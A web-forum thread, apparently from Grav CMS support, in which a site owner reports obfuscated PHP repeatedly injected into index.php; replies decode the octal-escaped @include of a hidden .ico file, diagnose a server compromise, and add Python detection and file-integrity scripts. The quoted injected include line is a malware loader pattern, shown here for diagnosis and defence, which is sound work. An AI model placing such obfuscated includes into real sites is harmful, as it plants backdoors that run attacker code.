
Gibberish in index.php

first-time

Solved by Ole Vik

Started by Cactus 8 years ago · 8 replies · 1111 views
8 years ago

Hello!
Just started using Grav to build a site for a client and I've been having a weird recurring issue. Every day or so I get an error 500 while trying to access the site, and I've managed to trace it to some weird code that keeps getting added to index.php, right before the credits and namespace declaration:

```php
<?php

/272b5/

@include "\057srv\057www\057sea\154ete\141m6.\143om/\160ubl\151c_h\164ml/\166end\157r/c\157mpo\163er/\143a-b\165ndl\145/.4\063fa9\143cd.\151co";

/272b5/
```

I delete it and the site works, but it keeps coming back every day. It's slightly different code every day too. I'm not sure what's going on. Here's a list of plugins I have installed:
http://bit.ly/2J9BY05

Would love any advice on how to solve this 🙂

last edited 07/10/18 by Cactus
8 years ago

My first thought is that your server is compromised. Nothing should be modifying your index.php file.

If you investigate and find it's via a Grav vulnerability, please report it using the process described in the docs (email to [email protected] in first instance).

Good luck.

8 years ago

I agree with Hughbris. It looks like code that is deliberately obfuscated, for which there is rarely a legitimate reason. The encoding isn't consistent, but it looks like it's trying to include a composer bundle, which could likely be malicious code.

8 years ago

Deobfuscating the code online renders:

@include /srv/www/sealeteam6.com/public_html/vendor/composer/ca-bundle/.43fa9ccd.ico;

Does this ring a bell?

👍 1
last edited 07/11/18 by pamtbaau
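The decoding pamtbaau did online can be reproduced offline with a small decoder for PHP double-quoted string escapes, which is useful when triaging a whole tree rather than one line. The following is an added example for defenders, not code from the thread or from Grav. It embeds a constructed copy of the injected line from the first post (the `/272b5/` markers are assumed to have been `/*272b5*/` comments whose asterisks were lost in rendering), resolves the octal and hex escapes PHP honours inside double quotes, and flags any include whose decoded target hides behind a dot-file name or a non-PHP extension, which is exactly the `.43fa9ccd.ico` pattern seen here. The heuristic in `is_suspicious_target` is mine.

```python
import re

# Constructed sample, copied from the thread's first post. The comment markers are
# assumed to have been /*272b5*/ (the asterisks were likely eaten by the forum renderer).
INJECTED_SAMPLE = r'''<?php

/*272b5*/

@include "\057srv\057www\057sea\154ete\141m6.\143om/\160ubl\151c_h\164ml/\166end\157r/c\157mpo\163er/\143a-b\165ndl\145/.4\063fa9\143cd.\151co";

/*272b5*/

namespace Grav;
'''

# Escape forms PHP honours inside double-quoted strings: \x hex, octal, \u{...}, and the
# single-character escapes. Anything else PHP leaves as a literal backslash.
_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|[nrtvef\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b", "f": "\f",
           "\\": "\\", "$": "$", '"': '"'}


def decode_php_dq(raw):
    """Resolve PHP double-quoted escapes so an obfuscated literal becomes readable."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        if esc[0] == "u":
            return chr(int(esc[2:-1], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)  # PHP wraps octal values above \377
        return _SIMPLE[esc]
    return _ESCAPE_RE.sub(repl, raw)


# include/require with a double-quoted literal; single-quoted strings cannot carry
# octal/hex escapes and are left alone.
_INCLUDE_RE = re.compile(
    r'(@?\s*(?:include|include_once|require|require_once))\s*\(?\s*"((?:[^"\\]|\\.)*)"',
    re.IGNORECASE)

_CODE_EXTS = (".php", ".phtml", ".inc")


def is_suspicious_target(path):
    """Heuristic (mine): a dot-file name or a non-PHP extension is not how real code ships."""
    name = path.rsplit("/", 1)[-1]
    return name.startswith(".") or not name.lower().endswith(_CODE_EXTS)


def find_obfuscated_includes(src):
    """Return every include whose string literal used escapes, with its decoded target."""
    findings = []
    for m in _INCLUDE_RE.finditer(src):
        raw = m.group(2)
        if "\\" not in raw:
            continue  # a plain path; nothing was hidden
        target = decode_php_dq(raw)
        findings.append({
            "statement": m.group(1).strip(),
            "raw": raw,
            "target": target,
            "suspicious": is_suspicious_target(target),
        })
    return findings


if __name__ == "__main__":
    for hit in find_obfuscated_includes(INJECTED_SAMPLE):
        flag = "SUSPICIOUS" if hit["suspicious"] else "ok"
        print(f"{flag}: {hit['statement']} -> {hit['target']}")
```

Running `find_obfuscated_includes` over every `.php` file under the web root gives a quick list of the files to inspect; a plain `require __DIR__ . '/vendor/autoload.php';` produces no finding because nothing in it was escaped.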
8 years ago Solution

This is a common injection-attack, that typically stems from compromised access to the server. I've seen it most commonly with regular FTP-credentials being sniffed in transport, and easily remedied by enforcing all server-access through SFTP with key-auth. None of your plugins have known flaws that would allow this, nor does Grav Core, so start by purging all accounts with server-access (through FTP, SSH, other scripts that may allow direct-file editing) and reinstall Grav with plugins. Enforce a strict policy of FTP through SFTP with a key-pair for access, and limit the amount of users with this to the bare minimum.

The code tries to have the server execute remote scripts, typically hidden behind "regular" files, which composer/ca-bundle is, but a normal installation of ca-bundle does not include .43fa9ccd.ico -- showing that it was placed there maliciously. Further, you should not be using or allow root access, and ideally keep executable files -- such as PHP -- locked behind permissions so they are not editable by general server-users.

👍 2
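Ole Vik's answer comes down to two checks a site owner can run on their own box: has anything under the web root changed since a known-good install, and are PHP files writable by accounts other than their owner. The following added example (mine, not the thread's or Grav's) builds a SHA-256 manifest of a tree, diffs it against a later snapshot so injected and added files stand out, and lists group- or world-writable files. The demo tree, the modified `index.php`, its loosened permissions and the stray `.43fa9ccd.ico` are constructed; the include string written into the demo is a placeholder.

```python
import hashlib
import os
import stat
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map every regular file under root (relative path) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def diff_manifest(baseline, current):
    """Report files that appeared, vanished or changed relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def loosely_writable(root):
    """List files under root that are group- or world-writable."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.stat(full).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def _write(root, rel, text, mode=0o644):
    """Helper for the constructed demo tree."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)
    os.chmod(full, mode)


def demo():
    """Constructed scenario mirroring the thread: snapshot a clean tree, re-check after an injection."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php\nnamespace Grav;\n")
        _write(root, "vendor/composer/ca-bundle/autoload.php", "<?php\n")
        baseline = build_manifest(root)  # taken right after a clean (re)install

        # Simulate what the thread describes: index.php gains an @include line and a
        # non-PHP file appears inside a legitimate vendor package. The include target
        # is a placeholder, and the 0o664 mode stands in for a file left group-writable.
        _write(root, "index.php", '<?php\n@include "PLACEHOLDER_PATH";\nnamespace Grav;\n', mode=0o664)
        _write(root, "vendor/composer/ca-bundle/.43fa9ccd.ico", "<?php /* placeholder payload */\n")

        report = diff_manifest(baseline, build_manifest(root))
        report["writable"] = loosely_writable(root)
        return report


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

In practice the baseline manifest is written to disk (or off-box) right after the reinstall Ole Vik recommends, and the diff is run from cron; a daily "modified: index.php" is the signal the original poster was catching by hand with an error 500.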
8 years ago

@pamtbaau haha, using bacon ipsum for filler text.

@OleVik I use RSA keys for my server with root disabled. Maybe I have a bigger problem.

Thanks for the insights

8 years ago

@cactus Don't forget to come back and tell us if you solve your problem and how. I'm interested in knowing how you fixed it.

8 years ago

I solved it by moving servers. I neglected to keep my existing server up to date for 4 years, haha. Been putting it off for a while but now I have an even faster and more secure stack.

👍 1
8 years ago

That is a pretty big factor: there are endless patches to solve security issues allowing unwarranted access in operating systems, as well as for PHP and at the hardware level (most recently Spectre and Meltdown). It's a benefit of shared hosting that the good ones typically keep up-to-date and on top of things. On self-managed servers/VPS, we'll have to be ever more vigilant ourselves.

👍 1
